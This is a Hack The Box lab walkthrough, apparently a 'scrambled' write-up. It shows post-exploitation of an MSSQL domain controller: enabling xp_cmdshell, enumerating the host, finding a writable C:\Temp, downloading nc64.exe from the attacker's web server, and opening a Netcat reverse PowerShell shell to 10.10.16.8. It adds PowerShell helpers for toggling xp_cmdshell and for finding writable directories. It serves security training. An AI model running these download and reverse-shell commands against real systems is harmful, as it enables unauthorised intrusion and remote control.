xp_cmdshell


Because the impersonated SCRM\administrator login is a sysadmin on the MSSQL instance, I can execute OS commands through the xp_cmdshell extended stored procedure.

SQL (SCRM\administrator  dbo@master)> enable_xp_cmdshell
[*] info(dc1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] info(dc1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE 

enable_xp_cmdshell is not a SQL Server feature; it is a helper command of impacket's mssqlclient.py that runs sp_configure to turn on 'show advanced options' and 'xp_cmdshell', each followed by RECONFIGURE. Changing these options needs the ALTER SETTINGS server permission, which the sysadmin role holds. The "changed from 1 to 1" messages show both options were already set on this instance, so the helper changed nothing and the extra RECONFIGURE is harmless.
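The same enable, verify and disable sequence, as an added example that is not the write-up's own code and not impacket's: it sends the T-SQL that enable_xp_cmdshell wraps through System.Data.SqlClient, checks sys.configurations for the effective value, and puts the setting back afterwards. The server name dc1 and Windows-integrated authentication are assumptions; it needs a login with sysadmin (or at least ALTER SETTINGS) on the instance.

```powershell
# Added example (not from the write-up): enable/verify/disable xp_cmdshell from PowerShell.
# Assumes a sysadmin-capable login; 'dc1' and Integrated Security are placeholders.

function Invoke-TSql {
    # Run a query and return each row as an object; used for the verification SELECTs.
    param(
        [Parameter(Mandatory)][System.Data.SqlClient.SqlConnection]$Connection,
        [Parameter(Mandatory)][string]$Query
    )
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    try {
        while ($reader.Read()) {
            $row = [ordered]@{}
            for ($i = 0; $i -lt $reader.FieldCount; $i++) {
                $row[$reader.GetName($i)] = $reader.GetValue($i)
            }
            [pscustomobject]$row
        }
    } finally { $reader.Close() }
}

function Set-XpCmdShell {
    # Same two sp_configure calls impacket's helper issues; RECONFIGURE applies each change.
    # When disabling, 'show advanced options' is also reset so the instance is left as found.
    param(
        [Parameter(Mandatory)][System.Data.SqlClient.SqlConnection]$Connection,
        [Parameter(Mandatory)][bool]$Enabled
    )
    $flag = [int]$Enabled
    $tsql = @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', $flag; RECONFIGURE;
"@
    if (-not $Enabled) {
        $tsql += "`nEXEC sp_configure 'show advanced options', 0; RECONFIGURE;"
    }
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = $tsql
    [void]$cmd.ExecuteNonQuery()
}

function Get-XpCmdShellState {
    # value_in_use is the running value; 'value' alone can differ until RECONFIGURE has run.
    param([Parameter(Mandatory)][System.Data.SqlClient.SqlConnection]$Connection)
    Invoke-TSql -Connection $Connection -Query @"
SELECT name, value, value_in_use FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');
"@
}

# Usage (placeholders: server 'dc1', integrated auth with the impersonated sysadmin identity)
$conn = New-Object System.Data.SqlClient.SqlConnection 'Server=dc1;Database=master;Integrated Security=True'
$conn.Open()
Set-XpCmdShell -Connection $conn -Enabled $true
Get-XpCmdShellState -Connection $conn | Format-Table -AutoSize
# Commands run as the SQL Server service account, not as the SQL login that called them.
Invoke-TSql -Connection $conn -Query "EXEC master..xp_cmdshell 'whoami'"
Set-XpCmdShell -Connection $conn -Enabled $false   # clean up when finished
$conn.Close()
```

Re-reading sys.configurations after the disable step is the check that matters: a defender (or a later pentester) looking at value_in_use sees whether the procedure was left enabled.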

SQL (SCRM\administrator  dbo@master)> xp_cmdshell whoami 
output        
-----------   
scrm\sqlsvc   
 
NULL          
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell hostname
output   
------   
DC1      
 
NULL     
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell ipconfig
output                                                                 
--------------------------------------------------------------------   
NULL                                                                   
 
Windows IP Configuration                                               
 
NULL                                                                   
 
NULL                                                                   
 
Ethernet adapter Ethernet0 2:                                          
 
NULL                                                                   
 
   Connection-specific DNS Suffix  . : htb                             
 
   IPv6 Address. . . . . . . . . . . : dead:beef::248                  
 
   IPv6 Address. . . . . . . . . . . : dead:beef::489:296d:9719:61ba   
 
   Link-local IPv6 Address . . . . . : fe80::489:296d:9719:61ba%14     
 
   IPv4 Address. . . . . . . . . . . : 10.10.11.168                    
 
   Subnet Mask . . . . . . . . . . . : 255.255.254.0                   
 
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%14     
 
                                       10.10.10.2                      
 
NULL                                                                   

Initial foothold established on the target (DC1, 10.10.11.168) by abusing the MSSQL instance with a forged TGS ticket. Note that xp_cmdshell runs commands as the SQL Server service account, scrm\sqlsvc, not as the impersonated administrator login, so that is the privilege level of this foothold.

Establishing A Stable Session


Although the initial foothold has been made, every command currently has to go through xp_cmdshell in the interactive SQL session: one blocking command at a time, with the output coming back as a result set. That is tedious, so I will try to "upgrade" it to a more stable shell.

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c mkdir C:\tmp"
output                                                                             
--------------------------------------------------------------------------------   
mkdir : Access to the path 'tmp' is denied.                                        
 
At line:1 char:1                                                                   
 
+ mkdir C:\tmp                                                                     
 
+ ~~~~~~~~~~~~                                                                     
 
    + CategoryInfo          : PermissionDenied: (C:\tmp:String) [New-Item], UnauthorizedAccessException   
 
    + FullyQualifiedErrorId : CreateDirectoryUnauthorizedAccessError,Microsoft.PowerShell.Commands.NewItemCommand   
 
                                                                                   
 
NULL                                                                               

Attempting to create a directory under the system root fails: the sqlsvc account does not have write access to C:\.

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c ls C:\"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               
 
NULL                                                                               
 
    Directory: C:\                                                                 
 
NULL                                                                               
 
NULL                                                                               
 
Mode                LastWriteTime         Length Name                                                                     
 
----                -------------         ------ ----                                                                     
 
d-----       03/11/2021     23:44                inetpub                                                                  
 
d-----       31/10/2021     21:13                PerfLogs                                                                 
 
d-r---       01/06/2022     12:43                Program Files                                                            
 
d-----       03/11/2021     16:50                Program Files (x86)                                                      
 
d-----       01/11/2021     15:21                Shares                                                                   
 
d-----       08/11/2021     00:39                Temp                                                                     
 
d-r---       05/11/2021     14:56                Users                                                                    
 
d-----       08/06/2022     23:39                Windows                                                                  
 
NULL                                                                               
 
NULL                                                                               
 
NULL
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c ls C:\Temp"
output   
------   
NULL     
 
SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c icacls C:\Temp"
output                                                      
---------------------------------------------------------   
C:\Temp BUILTIN\Users:(OI)(CI)(M)                           
 
        NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)                  
 
        BUILTIN\Administrators:(I)(OI)(CI)(F)               
 
        BUILTIN\Users:(I)(OI)(CI)(RX)                       
 
        CREATOR OWNER:(I)(OI)(CI)(IO)(F)                    
 
NULL                                                        
 
Successfully processed 1 files; Failed processing 0 files   
 
NULL                                                        

Interestingly, C:\Temp is empty and carries an explicit (non-inherited) ACE granting BUILTIN\Users Modify, (OI)(CI)(M), on top of the inherited default Read/Execute entry for Users. Since sqlsvc is a member of BUILTIN\Users, it can write there.
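Both checks above (the failed mkdir at C:\ and reading the icacls output for C:\Temp) are instances of one question: where can the current token write? The following added PowerShell, not from the write-up, answers it over every directory under a root at once by matching Allow ACEs against the user and group SIDs the token carries. It assumes it runs in the foothold's context (the sqlsvc shell); the root C:\ is a default, not something the page prescribes.

```powershell
# Added example, not part of the original write-up: triage which directories under a
# root the current token can write to. Same reasoning as reading icacls by hand,
# applied to every directory. Assumption: run it as the account you want to test.
function Find-WritableDirectory {
    param(
        [string]$Root = 'C:\',   # assumed starting point
        [switch]$Recurse
    )
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # Every SID in the token: the user plus all groups (BUILTIN\Users, Authenticated Users, ...)
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # Rights that let us drop a file or a directory; Modify and FullControl include these bits
    $writeMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                       [System.Security.AccessControl.FileSystemRights]::CreateDirectories)

    Get-ChildItem -LiteralPath $Root -Directory -Force -Recurse:$Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $dir = $_.FullName
        # No READ_CONTROL on the directory: we cannot see its ACL, skip it
        try { $acl = Get-Acl -LiteralPath $dir -ErrorAction Stop } catch { return }
        $grants = foreach ($ace in $acl.Access) {
            # Only Allow ACEs are evaluated; an explicit Deny for one of our SIDs would
            # still win, so treat hits as candidates and confirm with a real write.
            if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
            try {
                $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }   # account name that no longer resolves
            if ($sids -notcontains $sid) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) {
                $origin = if ($ace.IsInherited) { 'inherited' } else { 'explicit' }
                "$($ace.IdentityReference): $($ace.FileSystemRights) ($origin)"
            }
        }
        if ($grants) {
            [pscustomobject]@{ Path = $dir; Grants = ($grants -join '; ') }
        }
    }
}

# Usage from the foothold shell; explicit (non-inherited) Modify on an otherwise default
# tree, like C:\Temp above, is the kind of entry worth looking at.
Find-WritableDirectory | Format-Table -AutoSize
```

Confirm a candidate before relying on it, for example by creating and deleting a probe file in it: the ACL read is a filter, and an explicit Deny ACE or a sharing restriction can still refuse the write.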

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -c iwr http://10.10.16.8/nc64.exe -Outfile C:\Temp\nc64.exe"
output   
------   
NULL     

I will transfer a Netcat binary into that directory from a web server on my attacking host (10.10.16.8).

SQL (SCRM\administrator  dbo@master)> xp_cmdshell "powershell -ep bypass -c C:\Temp\nc64.exe 10.10.16.8 9999 -e powershell"
 
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ nnc 9999        
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.168] 52528
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\Windows\system32> whoami
whoami
scrm\sqlsvc
PS C:\Windows\system32> hostname
hostname
DC1
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::248
   IPv6 Address. . . . . . . . . . . : dead:beef::489:296d:9719:61ba
   Link-local IPv6 Address . . . . . : fe80::489:296d:9719:61ba%14
   IPv4 Address. . . . . . . . . . . : 10.10.11.168
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%14
                                       10.10.10.2

Upgraded to an interactive reverse PowerShell session as scrm\sqlsvc. One caveat: xp_cmdshell does not return until the process it spawned exits, so the mssqlclient prompt stays blocked for as long as this Netcat session is alive. If the SQL session must remain usable, launch the binary detached (for example with PowerShell's Start-Process) instead of running it in the foreground.